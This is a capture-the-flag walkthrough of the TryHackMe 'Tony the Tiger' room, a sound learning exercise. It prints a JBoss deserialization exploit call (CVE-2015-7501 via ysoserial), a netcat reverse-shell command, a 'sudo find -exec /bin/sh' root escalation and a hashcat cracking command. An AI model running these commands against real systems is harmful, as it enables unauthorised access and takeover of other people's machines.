Tony the Tiger
In this post, we will look into the room “Tony the Tigers” from TryHackMe, which can be found on https://tryhackme.com
This is an exploit on a message serialization vulnerability CVE-2015–7501, which allows code execution when desserializing messages.
So what we’ll do is try to execute some netcat reverse shell on the host to gain access and then rooting it.
Task 1 Deploy
Deploy the machine
Task 2 Intro
All answers are on the introduction paragraph so kindly written by the author of the room, figure it out!
Task 3 Recon
We can NMAP the host to check for open ports
nmap -sC -sV -oN nmap {IP}
Notice that the question explicitly asks for the 8080 port and in my case, it took a little longer to initialize, when comparing to the other open ports. Keep it in mind that if it returns closed, you might want to rerun the command.
>PORTSTATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 1024 d6:97:8c:b9:74:d0:f3:9e:fe:f3:a5:ea:f8:a9:b5:7a (DSA)| 2048 33:a4:7b:91:38:58:50:30:89:2d:e4:57:bb:07:bb:2f (RSA)| 256 21:01:8b:37:f5:1e:2b:c5:57:f1:b0:42:b7:32:ab:ea (ECDSA)|_ 256 f6:36:07:3c:3b:3d:71:30:c4:cd:2a:13:00:b5:25:ae (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))|_http-generator: Hugo 0.66.0|_http-server-header: Apache/2.4.7 (Ubuntu)|_http-title: Tony's Blog
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1| http-methods: |_ Potentially risky methods: PUT DELETE TRACE|_http-server-header: Apache-Coyote/1.1|_http-title: Welcome to JBoss ASService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
There we have it, so the SSH is open and there are two http servers running.
To answer the questions, we have:
- Service on 8080: Apache Tomcat/Coyote JSP engine 1.1
- Name of front-end application on 8080: JBoss
Task 4 Tony’s Flag
It took me quite some time to figure out what to do to get this flag, since I’m quite new to cybersecurity and all but hear that, we have to analyse the images.
See the Tony the Tiger image on a blue background ? download it
So the first thing you read on the Steganography topic is to run Strings
strings tony.jpg
There it is!!
Task 5 Exploit!
The room author kindly provides us the python script for exploiting on the vulnerability, let’s take a look.
Basically, we will run a POST request with a certain payload that exploits the Java vulnerability and executes our Linux command.
gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections5', args.command])
This utilizes the .jar file in order to create the executable payload with our command.
Then we call a post request with the payload
r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget)
Reverse Shell
Now we can reverse shell this machine to gain access:
On a terminal, run
nc -lvnp 8888
On another terminal, run
python exploit.py --ysoserial-path ysoserial.jar --proto http {IP}:8080 "nc {Self_IP} -e /bin/sh 8888"
our first terminal has access to the host terminal. For stability, spawn a TTY terminal by running:
python -c 'import pty; pty.spawn("/bin/bash")'
Task 6 Find User JBoss` flag
Now that we have access, check which user are we by running whoami.
As you can see, we are not JBoss.
Navigate to /home/jboss and ls -la to check for files.
cat note
Here we can chill and read the discussion between the two users and a new password for JBOSS user.
Access SSH on jboss:password
ssh jboss@{IP}
Navigate to /home/jboss and ls -la again.
cat the .jboss file to read the flag.
Task 7 Escalation!
We can always enumerate by utilizing a linEnum or linPeas but I always enjoy misconfigurations on SUID so let’s run
sudo -l
As we can see, the JBoss user is allowed to run /usr/bin/find as ROOT, maybe we can figure out a way to escape to shell from this command.
A first page search on linux escape to shell find got me here.
and we can now run the escape to shell using find command
sudo find /etc/passwd -exec /bin/sh \;
let’s cat /root/root.txt
and we get a flag………………………
but it’s clearly not the answer expected on THM.
It’s also not a known hash (hashid command does not identify it)
hashid {HASH}
Since I have a little experience with access tokens for system authentication, I noticed the “==” characters at the end of our flag and I thought well, maybe this is Base64 encoded.
So I went here, decoded it and guess what, hashid now identifies it as a simple MD5.
We can easily crack it with rockyou.txt now
hashcat -a 0 -m 0 {HASH} /usr/share/wordlists/rockyou.txt
and there we have it.